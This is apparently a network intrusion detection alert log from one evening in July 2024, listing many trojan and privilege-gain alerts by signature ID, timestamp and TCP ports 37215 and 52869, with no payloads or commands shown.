                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2835222
                      Source Port:39306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.136560
                      SID:2027339
                      Source Port:60048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.490989
                      SID:2831300
                      Source Port:58100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2831300
                      Source Port:45770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.878540
                      SID:2831300
                      Source Port:51740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.346494
                      SID:2025132
                      Source Port:41456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2027339
                      Source Port:52102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982801
                      SID:2829579
                      Source Port:48970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.176787
                      SID:2027339
                      Source Port:49826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2027339
                      Source Port:56826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632123
                      SID:2025132
                      Source Port:34600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.305781
                      SID:2025132
                      Source Port:52648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:47154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.063994
                      SID:2025132
                      Source Port:45782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:51646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.602081
                      SID:2025132
                      Source Port:49514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:32.073087
                      SID:2829579
                      Source Port:56496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:18.238800
                      SID:2027339
                      Source Port:60464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.905147
                      SID:2831300
                      Source Port:46932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.658201
                      SID:2829579
                      Source Port:38354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2027339
                      Source Port:40964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.915641
                      SID:2027339
                      Source Port:37908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.066716
                      SID:2025132
                      Source Port:37184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.808678
                      SID:2027339
                      Source Port:53342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.667239
                      SID:2027339
                      Source Port:53328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649697
                      SID:2835222
                      Source Port:58516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2829579
                      Source Port:58806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2835222
                      Source Port:35116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2835222
                      Source Port:45350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469869
                      SID:2831300
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.565561
                      SID:2027339
                      Source Port:54690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:59428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.541928
                      SID:2027339
                      Source Port:34978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2027339
                      Source Port:46844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2027339
                      Source Port:58212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520254
                      SID:2831300
                      Source Port:48396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.004907
                      SID:2835222
                      Source Port:46144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.562013
                      SID:2831300
                      Source Port:55056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2829579
                      Source Port:46002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:46230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633355
                      SID:2829579
                      Source Port:59428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2831300
                      Source Port:57992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.808111
                      SID:2831300
                      Source Port:49806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.650213
                      SID:2027339
                      Source Port:51888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.329747
                      SID:2027339
                      Source Port:34040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.569820
                      SID:2831300
                      Source Port:59236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.826098
                      SID:2027339
                      Source Port:59266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.176757
                      SID:2027339
                      Source Port:47606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.627588
                      SID:2027339
                      Source Port:51950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.745200
                      SID:2831300
                      Source Port:52492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.600303
                      SID:2027339
                      Source Port:42888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.026812
                      SID:2829579
                      Source Port:57606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2835222
                      Source Port:39784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.229799
                      SID:2027339
                      Source Port:59514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2829579
                      Source Port:53604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.943792
                      SID:2027339
                      Source Port:41816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2835222
                      Source Port:60358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.302154
                      SID:2831300
                      Source Port:52690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.413915
                      SID:2831300
                      Source Port:49516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2829579
                      Source Port:49532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.646505
                      SID:2831300
                      Source Port:51246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:51778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2835222
                      Source Port:33084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.640831
                      SID:2831300
                      Source Port:35026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.795218
                      SID:2027339
                      Source Port:38366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2835222
                      Source Port:60098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.000471
                      SID:2831300
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.023698
                      SID:2831300
                      Source Port:56202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:51310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.262355
                      SID:2027339
                      Source Port:57412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.481306
                      SID:2027339
                      Source Port:56798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.449569
                      SID:2025132
                      Source Port:58072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2829579
                      Source Port:41674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.870961
                      SID:2027339
                      Source Port:42288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2831300
                      Source Port:49576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.498619
                      SID:2025132
                      Source Port:56578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2831300
                      Source Port:34798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.484644
                      SID:2831300
                      Source Port:49704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.169212
                      SID:2027339
                      Source Port:57438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2835222
                      Source Port:36904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.126921
                      SID:2027339
                      Source Port:52722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.119973
                      SID:2829579
                      Source Port:53292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.201033
                      SID:2835222
                      Source Port:56980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.367036
                      SID:2027339
                      Source Port:44160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.099180
                      SID:2027339
                      Source Port:51752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2829579
                      Source Port:41150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.212922
                      SID:2831300
                      Source Port:40040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.591274
                      SID:2831300
                      Source Port:37074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.624990
                      SID:2831300
                      Source Port:51404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.263141
                      SID:2027339
                      Source Port:43200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:30.172034
                      SID:2027339
                      Source Port:38216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.608574
                      SID:2027339
                      Source Port:50646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.522990
                      SID:2027339
                      Source Port:53746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633389
                      SID:2835222
                      Source Port:41340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.870348
                      SID:2027339
                      Source Port:37940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2829579
                      Source Port:43368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2829579
                      Source Port:59422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.758923
                      SID:2831300
                      Source Port:35628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.810143
                      SID:2831300
                      Source Port:35336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221017
                      SID:2835222
                      Source Port:59050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.672378
                      SID:2027339
                      Source Port:58926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.813611
                      SID:2025132
                      Source Port:41022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.358381
                      SID:2831300
                      Source Port:42794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.524925
                      SID:2027339
                      Source Port:56392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.939520
                      SID:2027339
                      Source Port:50552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.285243
                      SID:2831300
                      Source Port:36866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.816504
                      SID:2835222
                      Source Port:32888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.035756
                      SID:2025132
                      Source Port:38810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.606975
                      SID:2027339
                      Source Port:58218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.156942
                      SID:2027339
                      Source Port:41054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.599362
                      SID:2831300
                      Source Port:53054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.116780
                      SID:2025132
                      Source Port:34822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.740527
                      SID:2831300
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:34160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.821658
                      SID:2025132
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:18.278764
                      SID:2025132
                      Source Port:56808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2835222
                      Source Port:49718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.028836
                      SID:2835222
                      Source Port:35218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.304951
                      SID:2025132
                      Source Port:54288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:09.055028
                      SID:2027339
                      Source Port:54640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817297
                      SID:2835222
                      Source Port:38628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649775
                      SID:2829579
                      Source Port:33728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.138392
                      SID:2027339
                      Source Port:53770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.852602
                      SID:2027339
                      Source Port:40150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2831300
                      Source Port:44926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.523865
                      SID:2025132
                      Source Port:35540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.318305
                      SID:2025132
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.313415
                      SID:2027339
                      Source Port:42688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2835222
                      Source Port:47064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2835222
                      Source Port:37304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.890780
                      SID:2025132
                      Source Port:60936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.773722
                      SID:2831300
                      Source Port:36020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.837135
                      SID:2027339
                      Source Port:47254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.428891
                      SID:2027339
                      Source Port:52146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.378871
                      SID:2025132
                      Source Port:58286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2027339
                      Source Port:56310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.745085
                      SID:2831300
                      Source Port:47378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.143033
                      SID:2027339
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.987215
                      SID:2027339
                      Source Port:58068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632123
                      SID:2027339
                      Source Port:57086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.634606
                      SID:2831300
                      Source Port:33464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2835222
                      Source Port:42846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.322860
                      SID:2835222
                      Source Port:42490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.848727
                      SID:2027339
                      Source Port:52016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2829579
                      Source Port:57922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.319856
                      SID:2829579
                      Source Port:41910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.861753
                      SID:2831300
                      Source Port:49736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.058686
                      SID:2025132
                      Source Port:53072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.463055
                      SID:2831300
                      Source Port:47496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:35.459810
                      SID:2025132
                      Source Port:48992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2027339
                      Source Port:59674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.305893
                      SID:2025132
                      Source Port:60312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.199406
                      SID:2027339
                      Source Port:43286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.145932
                      SID:2831300
                      Source Port:52068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.001716
                      SID:2027339
                      Source Port:39670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.170156
                      SID:2027339
                      Source Port:40400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.895849
                      SID:2027339
                      Source Port:35128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.620386
                      SID:2831300
                      Source Port:50676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.636583
                      SID:2025132
                      Source Port:59580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.627588
                      SID:2027339
                      Source Port:41408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2835222
                      Source Port:50932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.567513
                      SID:2025132
                      Source Port:35712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.675171
                      SID:2025132
                      Source Port:39908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2027339
                      Source Port:57996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2835222
                      Source Port:51416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.089079
                      SID:2025132
                      Source Port:46226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:17.128771
                      SID:2027339
                      Source Port:53648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.187842
                      SID:2829579
                      Source Port:33894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.600680
                      SID:2831300
                      Source Port:34588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.541579
                      SID:2831300
                      Source Port:45090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.464382
                      SID:2025132
                      Source Port:42596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2835222
                      Source Port:42104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.143690
                      SID:2027339
                      Source Port:35542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:45.524183
                      SID:2025132
                      Source Port:41146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.325694
                      SID:2831300
                      Source Port:37036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.149832
                      SID:2025132
                      Source Port:41576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222080
                      SID:2835222
                      Source Port:46562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.693650
                      SID:2025132
                      Source Port:60962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.424201
                      SID:2027339
                      Source Port:57774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2835222
                      Source Port:44106
